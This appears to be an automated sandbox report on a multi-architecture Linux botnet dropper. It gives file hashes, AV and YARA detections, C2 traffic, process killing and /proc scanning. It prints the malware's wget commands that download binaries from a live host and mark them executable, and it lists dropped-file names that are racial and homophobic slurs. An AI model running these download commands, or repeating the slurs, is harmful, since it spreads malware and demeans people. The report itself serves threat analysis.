Linux Analysis Report

ID:	1417457
Product:	CloudBasic
Start time:	10:39:42
Start date:	29.03.2024
Cookbook:	defaultlinuxcmdlinecookbook.jbs
System description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Architecture:	LINUX

Name	Type	MD5	SHA1	SHA256
/tmp/blyat (deleted)	ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped	4429AEBB64433CA66DCC591F87FACD32	49EB4E80C62BFF92C3AB7F899B9FB3DF7B655E62	2D4AD51286FF92BFB8B338C39C50D135DCEFAFF4C05EFE5A39D00ED37ED4BACB
/tmp/faggot (deleted)	ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header	767AE994C753C82EBB6EFAE8D818102E	A93C35DBFF0D38D13E5DE5D0D7A512F9BE7E93F4	84017DA225B3D2800C184ED565D0DC04C2E277C5A78409F3C1633D2BB5426927
/tmp/gay	ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, no section header	2F4E349ADD535562D1E34C4EB5D8A122	636C788324F22FCAD48ADAF3CDFD623D46674B6F	F0283406AAFABE466FF5CAF8F7F77B38B59FF2C1B40FFC5EE332CA6F242FF567
/tmp/lmao (deleted)	ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header	54922A385EAA2BFAE7B9D36CCA0DEB93	E4C60FDF9C0A8D2B691A79D847B56D3BA0330088	DCEC103C40593F614DEE1E3F69E6E334B0C0EC22F2F46D1F8F48909A23716011
/tmp/lol	ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header	B37480B8866CCF0F713316C86CF3C96F	BBF4089B71A6F748510202AB017FA743D9F55C86	C9FA07137B268BAE37D93E0B25AC3244E37906F5773780D11A2978726BAE23B0
/tmp/nigga (deleted)	ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, no section header	9F3E360EAF94D852743151AE58470657	9A8ED1C2C025491BF89AA058E960E6BCDF5A1E43	11257A4079DA41130AB62A1CFCDDC6B5CE9B8C8EC66754362FFA9C58C3575BC5
/tmp/nigger (deleted)	ELF 32-bit LSB executable, ARM, EABI4 version 1 (GNU/Linux), statically linked, no section header	06B0A235DC0D0B6AA3DAD1DCD99363F2	45AC261435D9BED12A3B827657A3AAFB5CA39A38	8BD63A4C6212AD0299685891B997B4E0AA85CDDBBAD29959A3CF39B530EB8178
/tmp/retard	ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, no section header	F98206DEB724E062BE9552C0E8D4369B	8C0E23056AC72946E0F9C70A9408699790B71AD7	B7F972C2FFA6946D53734709FC4626EA952E3317229417B342796FDFD3CE99A1
/tmp/shit (deleted)	ELF 32-bit LSB executable, ARM, EABI4 version 1 (GNU/Linux), statically linked, no section header	470E1D1D14C1D6912253A23C7CE49AD0	4566282DCA22E6FB0A815CD9C79904F37E6AD5F5	C1FA7DCF5262E4C0D458653D934C9E7029BAF123C41E2FBC36888305EBB74A06
/tmp/shiteater (deleted)	ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped	94724E3B2AAE268C36BC4D6B1071F961	4760D6CF72B8BFB5D3472047669631A6C6F6F4CD	966065B717A06D4B8EF6952660504D55DD592C5E75B48C384D1442ADD300D71C
/tmp/what (deleted)	ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (GNU/Linux), statically linked, no section header	08C0F69B14D04E2ABA9DDE59F5F2F4DB	9434E6BD5F11877E19CE78FBDBE8B6E77331BAFA	009E150B464AA2D65B19154EC75B8A708A7410E0243964EAB173D1709479B89E
/usr/bin/wtf.sh	ASCII text	1F5487FCB966D06EB4FA323D01CAC5CA	ADE64C1FD8C202FFEE79B84F733D4EC223FDB8FC	3D29748414C2E043BB262177CB35B83DBD0F8329397B59E1660651B2BEDC1488

AV Detection

Source: /tmp/lmao (deleted)	Avira: detection malicious, Label: EXP/ELF.Agent.M.28
Source: /tmp/what (deleted)	Avira: detection malicious, Label: EXP/ELF.Agent.F.118
Source: /tmp/blyat (deleted)	Avira: detection malicious, Label: EXP/ELF.Mirai.W

Source: /tmp/nigga (deleted)	Joe Sandbox ML: detected
Source: /tmp/faggot (deleted)	Joe Sandbox ML: detected

Spreading

Source: shiteater (deleted).105.dr	String: %s/%s/proc//proc/%s/cmdlinewgetcurlnetstatgreppslsmvechokillbashrebootshutdownhaltpowerofffaggot got malware'd/tmp/opt/home/dev/var/sbin/proc/self/exe/mnt/root/dev/null/dev/consoleyouare.geek/dev/watchdog/dev/misc/watchdog
Source: blyat (deleted).114.dr	String: %s/%s/proc//proc/%s/cmdlinerwgetcurlnetstatgreppslsmvechokillbashrebootshutdownhaltpowerofffaggot got malware'd/tmp/opt/home/dev/var/sbin/proc/self/exe/mnt/root/dev/null/dev/consoleyouare.geek/dev/watchdog/dev/misc/watchdog/

Networking

Source: global traffic	TCP traffic: 192.168.2.23:60508 -> 104.168.45.11:7722
Source: global traffic	TCP traffic: 192.168.2.23:43278 -> 185.216.70.168:21425

Source: /bin/sh (PID: 6218)	Wget executable: /usr/bin/wget -> wget http://94.156.8.244/wtf.sh			Jump to behavior
Source: /bin/sh (PID: 6220)	Wget executable: /usr/bin/wget -> wget -O lol http://94.156.8.244/mips			Jump to behavior
Source: /bin/sh (PID: 6233)	Wget executable: /usr/bin/wget -> wget -O lmao http://94.156.8.244/mpsl			Jump to behavior
Source: /bin/sh (PID: 6258)	Wget executable: /usr/bin/wget -> wget -O faggot http://94.156.8.244/x86_64			Jump to behavior
Source: /bin/sh (PID: 6403)	Wget executable: /usr/bin/wget -> wget -O gay http://94.156.8.244/arm			Jump to behavior
Source: /bin/sh (PID: 6409)	Wget executable: /usr/bin/wget -> wget -O retard http://94.156.8.244/arm5			Jump to behavior
Source: /bin/sh (PID: 6425)	Wget executable: /usr/bin/wget -> wget -O nigger http://94.156.8.244/arm6			Jump to behavior
Source: /bin/sh (PID: 6430)	Wget executable: /usr/bin/wget -> wget -O shit http://94.156.8.244/arm7			Jump to behavior
Source: /bin/sh (PID: 6435)	Wget executable: /usr/bin/wget -> wget -O nigga http://94.156.8.244/i586			Jump to behavior
Source: /bin/sh (PID: 6440)	Wget executable: /usr/bin/wget -> wget -O kekw http://94.156.8.244/i686			Jump to behavior
Source: /bin/sh (PID: 6447)	Wget executable: /usr/bin/wget -> wget -O what http://94.156.8.244/powerpc			Jump to behavior
Source: /bin/sh (PID: 6478)	Wget executable: /usr/bin/wget -> wget -O kys http://94.156.8.244/sh4			Jump to behavior
Source: /bin/sh (PID: 6485)	Wget executable: /usr/bin/wget -> wget -O shiteater http://94.156.8.244/m68k			Jump to behavior
Source: /bin/sh (PID: 6501)	Wget executable: /usr/bin/wget -> wget -O blyat http://94.156.8.244/sparc			Jump to behavior

Source: /tmp/lol (PID: 6222)	Socket: 127.0.0.1::39123			Jump to behavior
Source: /tmp/retard (PID: 6411)	Socket: 127.0.0.1::39123			Jump to behavior

Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.11
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.8.244

Source: global traffic	HTTP traffic detected: GET /wtf.sh HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mips HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mpsl HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /x86_64 HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /arm HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /arm5 HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /arm6 HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /arm7 HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /i586 HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /powerpc HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /sh4 HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m68k HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /sparc HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: youare.geek

Source: lol, 6228.1.00007f41f8468000.00007f41f849e000.rw-.sdmp	String found in binary or memory: http://94.156.8.244/arm
Source: wtf.sh.12.dr	String found in binary or memory: http://94.156.8.244/arm5;
Source: wtf.sh.12.dr	String found in binary or memory: http://94.156.8.244/arm6;
Source: wtf.sh.12.dr	String found in binary or memory: http://94.156.8.244/arm7;
Source: wtf.sh.12.dr	String found in binary or memory: http://94.156.8.244/arm;
Source: lol, 6228.1.00007f41f8468000.00007f41f849e000.rw-.sdmp	String found in binary or memory: http://94.156.8.244/armwtf.sh;
Source: wtf.sh.12.dr	String found in binary or memory: http://94.156.8.244/i586;
Source: wtf.sh.12.dr	String found in binary or memory: http://94.156.8.244/i686;
Source: wtf.sh.12.dr	String found in binary or memory: http://94.156.8.244/m68k;
Source: wtf.sh.12.dr	String found in binary or memory: http://94.156.8.244/mips;
Source: wtf.sh.12.dr	String found in binary or memory: http://94.156.8.244/mpsl;
Source: wtf.sh.12.dr	String found in binary or memory: http://94.156.8.244/powerpc;
Source: wtf.sh.12.dr	String found in binary or memory: http://94.156.8.244/sh4;
Source: wtf.sh.12.dr	String found in binary or memory: http://94.156.8.244/sparc;
Source: wtf.sh.12.dr	String found in binary or memory: http://94.156.8.244/x86_64;
Source: lmao (deleted).26.dr, nigga (deleted).77.dr, what (deleted).89.dr, retard.55.dr, lol.16.dr, faggot (deleted).32.dr, nigger (deleted).65.dr	String found in binary or memory: http://upx.sf.net

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

System Summary

Source: dump.pcap, type: PCAP	Matched rule: Linux_Trojan_Ircbot_bb204b81 Author: unknown
Source: /tmp/faggot (deleted), type: DROPPED	Matched rule: Linux_Trojan_Ircbot_bb204b81 Author: unknown

Source: /tmp/lol (PID: 6224)	SIGKILL sent: pid: -6224, result: unknown			Jump to behavior
Source: /tmp/lol (PID: 6228)	SIGKILL sent: pid: 721, result: successful			Jump to behavior
Source: /tmp/lol (PID: 6228)	SIGKILL sent: pid: 904, result: successful			Jump to behavior
Source: /tmp/lol (PID: 6228)	SIGKILL sent: pid: 912, result: successful			Jump to behavior
Source: /tmp/lol (PID: 6228)	SIGKILL sent: pid: 918, result: successful			Jump to behavior
Source: /tmp/lol (PID: 6228)	SIGKILL sent: pid: 936, result: successful			Jump to behavior
Source: /tmp/lol (PID: 6228)	SIGKILL sent: pid: 1601, result: successful			Jump to behavior
Source: /tmp/lol (PID: 6228)	SIGKILL sent: pid: 1638, result: successful			Jump to behavior
Source: /tmp/lol (PID: 6228)	SIGKILL sent: pid: 1877, result: successful			Jump to behavior
Source: /tmp/lol (PID: 6228)	SIGKILL sent: pid: 6226, result: successful			Jump to behavior
Source: /tmp/lol (PID: 6228)	SIGKILL sent: pid: 6231, result: successful			Jump to behavior
Source: /tmp/lol (PID: 6228)	SIGKILL sent: pid: 6259, result: successful			Jump to behavior
Source: /tmp/lol (PID: 6228)	SIGKILL sent: pid: 6403, result: successful			Jump to behavior
Source: /tmp/retard (PID: 6421)	SIGKILL sent: pid: 904, result: successful			Jump to behavior
Source: /tmp/retard (PID: 6421)	SIGKILL sent: pid: 936, result: successful			Jump to behavior
Source: /tmp/retard (PID: 6421)	SIGKILL sent: pid: 1877, result: successful			Jump to behavior
Source: /tmp/retard (PID: 6421)	SIGKILL sent: pid: 6430, result: successful			Jump to behavior
Source: /tmp/retard (PID: 6421)	SIGKILL sent: pid: 6440, result: successful			Jump to behavior
Source: /tmp/retard (PID: 6421)	SIGKILL sent: pid: 6478, result: successful			Jump to behavior
Source: /tmp/retard (PID: 6421)	SIGKILL sent: pid: 6485, result: successful			Jump to behavior
Source: /tmp/retard (PID: 6421)	SIGKILL sent: pid: 6501, result: successful			Jump to behavior

Source: /tmp/lol (PID: 6224)	SIGKILL sent: pid: -6224, result: unknown			Jump to behavior
Source: /tmp/lol (PID: 6228)	SIGKILL sent: pid: 721, result: successful			Jump to behavior
Source: /tmp/lol (PID: 6228)	SIGKILL sent: pid: 904, result: successful			Jump to behavior
Source: /tmp/lol (PID: 6228)	SIGKILL sent: pid: 912, result: successful			Jump to behavior
Source: /tmp/lol (PID: 6228)	SIGKILL sent: pid: 918, result: successful			Jump to behavior
Source: /tmp/lol (PID: 6228)	SIGKILL sent: pid: 936, result: successful			Jump to behavior
Source: /tmp/lol (PID: 6228)	SIGKILL sent: pid: 1601, result: successful			Jump to behavior
Source: /tmp/lol (PID: 6228)	SIGKILL sent: pid: 1638, result: successful			Jump to behavior
Source: /tmp/lol (PID: 6228)	SIGKILL sent: pid: 1877, result: successful			Jump to behavior
Source: /tmp/lol (PID: 6228)	SIGKILL sent: pid: 6226, result: successful			Jump to behavior
Source: /tmp/lol (PID: 6228)	SIGKILL sent: pid: 6231, result: successful			Jump to behavior
Source: /tmp/lol (PID: 6228)	SIGKILL sent: pid: 6259, result: successful			Jump to behavior
Source: /tmp/lol (PID: 6228)	SIGKILL sent: pid: 6403, result: successful			Jump to behavior
Source: /tmp/retard (PID: 6421)	SIGKILL sent: pid: 904, result: successful			Jump to behavior
Source: /tmp/retard (PID: 6421)	SIGKILL sent: pid: 936, result: successful			Jump to behavior
Source: /tmp/retard (PID: 6421)	SIGKILL sent: pid: 1877, result: successful			Jump to behavior
Source: /tmp/retard (PID: 6421)	SIGKILL sent: pid: 6430, result: successful			Jump to behavior
Source: /tmp/retard (PID: 6421)	SIGKILL sent: pid: 6440, result: successful			Jump to behavior
Source: /tmp/retard (PID: 6421)	SIGKILL sent: pid: 6478, result: successful			Jump to behavior
Source: /tmp/retard (PID: 6421)	SIGKILL sent: pid: 6485, result: successful			Jump to behavior
Source: /tmp/retard (PID: 6421)	SIGKILL sent: pid: 6501, result: successful			Jump to behavior

Source: dump.pcap, type: PCAP

Matched rule: Linux_Trojan_Ircbot_bb204b81 reference_sample = 6147481d083c707dc98905a1286827a6e7009e08490e7d7c280ed5a6356527ad, os = linux, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Ircbot, fingerprint = 66f9a8a31653a5e480f427d2d6a25b934c2c53752308eedb57eaa7b7cb7dde2e, id = bb204b81-db58-434f-b834-672cdc25e56c, last_modified = 2021-09-16

Source: /tmp/faggot (deleted), type: DROPPED

Matched rule: Linux_Trojan_Ircbot_bb204b81 reference_sample = 6147481d083c707dc98905a1286827a6e7009e08490e7d7c280ed5a6356527ad, os = linux, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Ircbot, fingerprint = 66f9a8a31653a5e480f427d2d6a25b934c2c53752308eedb57eaa7b7cb7dde2e, id = bb204b81-db58-434f-b834-672cdc25e56c, last_modified = 2021-09-16

Source: classification engine

Classification label: mal80.spre.evad.lin@0/12@1/0

Data Obfuscation

Source: /tmp/retard (PID: 6419)

Deleted: /dev/kmsg

Jump to behavior

Persistence and Installation Behavior

Source: /tmp/retard (PID: 6421)	File opened: /proc/6472/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/6472/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/6471/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/6471/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/6474/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/6474/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/6473/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/6473/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/6476/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/6476/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/6475/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/6475/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/6478/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/3088/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/3088/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/3088/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/3088/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/3088/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/3088/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/3088/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/6470/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/6470/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/230/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/230/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/230/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/230/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/230/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/230/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/230/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/110/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/110/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/110/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/110/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/110/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/110/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/110/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/231/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/231/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/231/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/231/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/231/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/231/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/231/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/111/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/111/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/111/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/111/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/111/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/111/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/111/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/232/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/232/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/232/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/232/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/232/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/232/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/232/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/112/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/112/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/112/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/112/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/112/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/112/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/112/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/233/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/233/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/233/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/233/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/233/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/233/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/233/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/1699/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/1699/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/1699/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/1699/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/1699/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/1699/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/1699/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/113/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/113/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/113/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/113/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/113/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/113/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/113/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/234/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/234/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/234/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/234/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/234/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/234/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/234/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/1335/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/1335/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/1335/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/1335/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/1335/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/1335/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/1335/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/114/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/114/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/114/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/114/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/114/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/114/cmdline			Jump to behavior
Source: /tmp/retard (PID: 6421)	File opened: /proc/114/cmdline			Jump to behavior

Source: /bin/sh (PID: 6221)	Chmod executable: /usr/bin/chmod -> chmod +x lol			Jump to behavior
Source: /bin/sh (PID: 6256)	Chmod executable: /usr/bin/chmod -> chmod +x lmao			Jump to behavior
Source: /bin/sh (PID: 6399)	Chmod executable: /usr/bin/chmod -> chmod +x faggot			Jump to behavior
Source: /bin/sh (PID: 6404)	Chmod executable: /usr/bin/chmod -> chmod +x gay			Jump to behavior
Source: /bin/sh (PID: 6410)	Chmod executable: /usr/bin/chmod -> chmod +x retard			Jump to behavior
Source: /bin/sh (PID: 6428)	Chmod executable: /usr/bin/chmod -> chmod +x nigger			Jump to behavior
Source: /bin/sh (PID: 6433)	Chmod executable: /usr/bin/chmod -> chmod +x shit			Jump to behavior
Source: /bin/sh (PID: 6438)	Chmod executable: /usr/bin/chmod -> chmod +x nigga			Jump to behavior
